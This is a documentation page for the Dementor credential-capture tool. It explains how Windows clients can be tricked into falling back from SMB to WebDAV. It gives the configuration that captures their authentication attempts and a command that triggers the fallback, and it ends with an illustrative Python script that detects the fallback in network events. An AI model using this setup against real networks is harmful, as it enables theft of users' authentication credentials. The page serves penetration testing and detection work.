WebDAV Fallback

See also

For a more detailed explanation of this attack, please refer to this excellent article from Synacktiv: Tricking Windows SMB clients into falling back to WebDav.

Windows clients with the WebDAV redirector installed can be tricked into authenticating against a WebDAV server if SMB access fails. Note that QUIC must also be disabled, as it takes precedence over WebDAV. The protocol resolution order on Windows is:

  1. SMB (Port 445)

  2. QUIC (Port 443)

  3. WebDAV (Port 80, if the WebDAV Redirector service is active)

To leverage this behavior, modify the configuration for Dementor as shown below:

[Dementor]
# [...]
SMB = true
HTTP = true
# [...]
QUIC = false

[SMB]
# [...]
ErrorCode = "STATUS_BAD_NETWORK_NAME"

[HTTP]
# Make sure WebDAV support is enabled
WebDAV = true

Triggering the Fallback

To trigger the fallback behavior, simply attempt to list files from a nonexistent or inaccessible SMB share:

C:\Users\Administrator> dir \\FILESRV01\internal
The specified network name is no longer available.

In this scenario, the Windows client will first attempt to authenticate via SMB, fail with the specified error, and then fall back to WebDAV. Dementor will capture authentication attempts from both the SMB and WebDAV services.

Specific error codes trick Windows clients into using WebDAV as a fallback mechanism.
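
On the network, the fallback described above shows up as an SMB attempt (port 445) followed shortly by a request from the Windows WebDAV redirector (User-Agent beginning with Microsoft-WebDAV-MiniRedir) to port 80 on the same host. The detection logic below is an added example and not part of Dementor; the event tuple layout, the addresses, and the 30-second correlation window are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real traffic):
# (time, source, destination, dest port, HTTP method, HTTP User-Agent)
EVENTS = [
    ("2024-05-01T10:00:00", "10.0.0.21", "10.0.0.66", 445, None, None),
    ("2024-05-01T10:00:01", "10.0.0.21", "10.0.0.66", 443, None, None),
    ("2024-05-01T10:00:02", "10.0.0.21", "10.0.0.66", 80, "OPTIONS",
     "Microsoft-WebDAV-MiniRedir/10.0.19045"),
    ("2024-05-01T10:00:03", "10.0.0.21", "10.0.0.66", 80, "PROPFIND",
     "Microsoft-WebDAV-MiniRedir/10.0.19045"),
    # Ordinary browsing to a host never contacted over SMB: no alert.
    ("2024-05-01T10:05:00", "10.0.0.30", "10.0.0.80", 80, "GET", "Mozilla/5.0"),
    # SMB attempt with no HTTP follow-up inside the window: no alert.
    ("2024-05-01T10:06:00", "10.0.0.31", "10.0.0.10", 445, None, None),
    ("2024-05-01T11:00:00", "10.0.0.31", "10.0.0.10", 80, "PROPFIND",
     "Microsoft-WebDAV-MiniRedir/10.0.19045"),
]

WEBDAV_UA_PREFIX = "microsoft-webdav-miniredir"
WINDOW = timedelta(seconds=30)  # assumed correlation window


def find_fallbacks(events, window=WINDOW):
    """Return (src, dst, smb_time, webdav_time) for each SMB -> WebDAV fallback."""
    last_smb = {}  # (src, dst) -> time of the most recent SMB attempt
    alerts = []
    for ts, src, dst, port, _method, ua in sorted(events, key=lambda e: e[0]):
        when = datetime.fromisoformat(ts)
        key = (src, dst)
        if port == 445:
            last_smb[key] = when
        elif port == 80 and ua and ua.lower().startswith(WEBDAV_UA_PREFIX):
            smb_time = last_smb.get(key)
            if smb_time is not None and when - smb_time <= window:
                alerts.append((src, dst, smb_time, when))
                del last_smb[key]  # one alert per fallback, not per request
    return alerts


if __name__ == "__main__":
    for src, dst, smb_t, dav_t in find_fallbacks(EVENTS):
        delay = (dav_t - smb_t).total_seconds()
        print(f"{src}: SMB to {dst} followed by WebDAV after {delay:.0f}s")
```

An alert on an internal destination that is not a known WebDAV server is worth checking against the WebDAV Redirector service state on the source host.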